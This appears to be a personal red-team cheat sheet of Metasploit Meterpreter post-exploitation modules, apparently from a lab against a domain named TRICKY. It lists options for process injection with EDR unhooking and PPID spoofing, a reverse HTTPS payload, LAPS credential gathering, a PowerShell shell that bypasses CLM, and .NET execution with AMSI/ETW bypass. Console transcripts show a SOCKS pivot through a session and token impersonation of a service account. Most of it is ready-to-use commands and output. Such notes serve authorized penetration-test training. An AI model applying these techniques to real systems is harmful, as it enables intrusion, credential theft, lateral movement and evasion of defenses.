Backlink: reference-notes-readme


Meterpreter Tips and Tricks

Post Modules in Open Session

Use the following modules from the meterpreter prompt with: run [module] [opts]

Module: post/windows/manage/run_as

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   CMD                        yes       Command to execute
   CMDOUT    false            yes       Retrieve command output
   DOMAIN                     yes       Domain to login with
   PASSWORD                   yes       Password to login with
   SESSION                    yes       The session to run this module on
   USER                       yes       Username to login with

Module: /post/windows/manage/run_as_psh

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   ARGS                          no        Arguments
   CHANNELIZE   true             yes       Chanelize output, required for reading output or interracting
   DOMAIN                        no        Domain of user
   EXE          cmd.exe          yes       Executable to run
   HIDDEN       true             yes       Hide the window
   INTERACTIVE  true             yes       Run interactively
   PASS                          yes       Password of user
   PATH         C:\              yes       Working Directory
   SESSION                       yes       The session to run this module on
   USER                          yes       User to run executable as

Module: post/windows/manage/archmigrate

Default options should execute without issue.

aaa

Module: windows/local/payload_inject

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   AUTOUNHOOK   false            no        Auto remove EDRs hooks
   PID          0                no        Process Identifier to inject of process to inject payload. 0=New Process
   PPID         0                no        Process Identifier for PPID spoofing when creating a new process. (0 = no PPID spoofing)
   SESSION                       yes       The session to run this module on
   WAIT_UNHOOK  5                yes       Seconds to wait for unhook to be executed


Payload options (windows/x64/meterpreter/reverse_https):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     0.0.0.0          yes       The local listener hostname
   LPORT     443              yes       The local listener port
   LURI                       no        The HTTP Path


Exploit target:

   Id  Name
   --  ----
   0   Windows

Module: post/windows/gather/credentials/enum_laps


Module: powershell

load powershell

Use the above command to load the powershell extension.

powershell_shell

Use the above command to open a new powershell shell, which will have bypassed CLM restrictions.


Module: multi/manage/autoroute

c:\Users\will>^Z
Background channel 1? [y/N]  y
meterpreter > bg
[*] Backgrounding session 2...

msf6 exploit(multi/handler) > use multi/manage/autoroute
[*] Using configured payload windows/x64/meterpreter/reverse_https

msf6 post(multi/manage/autoroute) > set session 2
session => 2

msf6 post(multi/manage/autoroute) > exploit

[!] SESSION may not be compatible with this module:
[!]  * incompatible session platform: windows
[*] Running module against CLIENT09
[*] Searching for subnets to autoroute.
[+] Route added to subnet 172.16.76.0/255.255.255.0 from host's routing table.
[*] Post module execution completed

msf6 post(multi/manage/autoroute) > use auxiliary/server/socks_proxy 
[*] Using configured payload windows/x64/meterpreter/reverse_https

msf6 auxiliary(server/socks_proxy) > set srvhost 127.0.0.1
srvhost => 127.0.0.1

msf6 auxiliary(server/socks_proxy) > run -j
[*] Auxiliary module running as background job 0.
[*] Starting the SOCKS proxy server

Reference the commands above to set up a SOCKS proxy through a meterpreter session.


Module: incognito

Incognito Commands
==================

    Command              Description
    -------              -----------
    add_group_user       Attempt to add a user to a global group with all tokens
    add_localgroup_user  Attempt to add a user to a local group with all tokens
    add_user             Attempt to add a user with all tokens
    impersonate_token    Impersonate specified token
    list_tokens          List tokens available under current user context
    snarf_hashes         Snarf challenge/response hashes for every token
meterpreter > use incognito

meterpreter > list_tokens -u

Delegation Tokens Available
========================================
Font Driver Host\UMFD-0
Font Driver Host\UMFD-1
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
NT SERVICE\SQLTELEMETRY$SQLEXPRESS
SQL05\setup
TRICKY\sqlsvc
Window Manager\DWM-1

Impersonation Tokens Available
========================================
No tokens available


meterpreter > impersonate_token TRICKY\\sqlsvc
[+] Delegation token available
[+] Successfully impersonated user TRICKY\sqlsvc

meterpreter > getuid
Server username: TRICKY\sqlsvc



Module: post/windows/manage/execute_dotnet_assembly

Module options (post/windows/manage/execute_dotnet_assembly):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   AMSIBYPASS      true             yes       Enable Amsi bypass
   ARGUMENTS                        no        Command line arguments
   DOTNET_EXE                       yes       Assembly file name
   ETWBYPASS       true             yes       Enable Etw bypass
   PID             0                no        Pid  to inject
   PPID            0                no        Process Identifier for PPID spoofing when creating a new process. (0 = no PPID spoofing)
   PROCESS         notepad.exe      no        Process to spawn
   SESSION                          yes       The session to run this module on
   Signature       Automatic        yes       The Main function signature (Accepted: Automatic, Main(), Main(string[]))
   USETHREADTOKEN  true             no        Spawn process with thread impersonation
   WAIT            10               no        Time in seconds to wait

Thats it.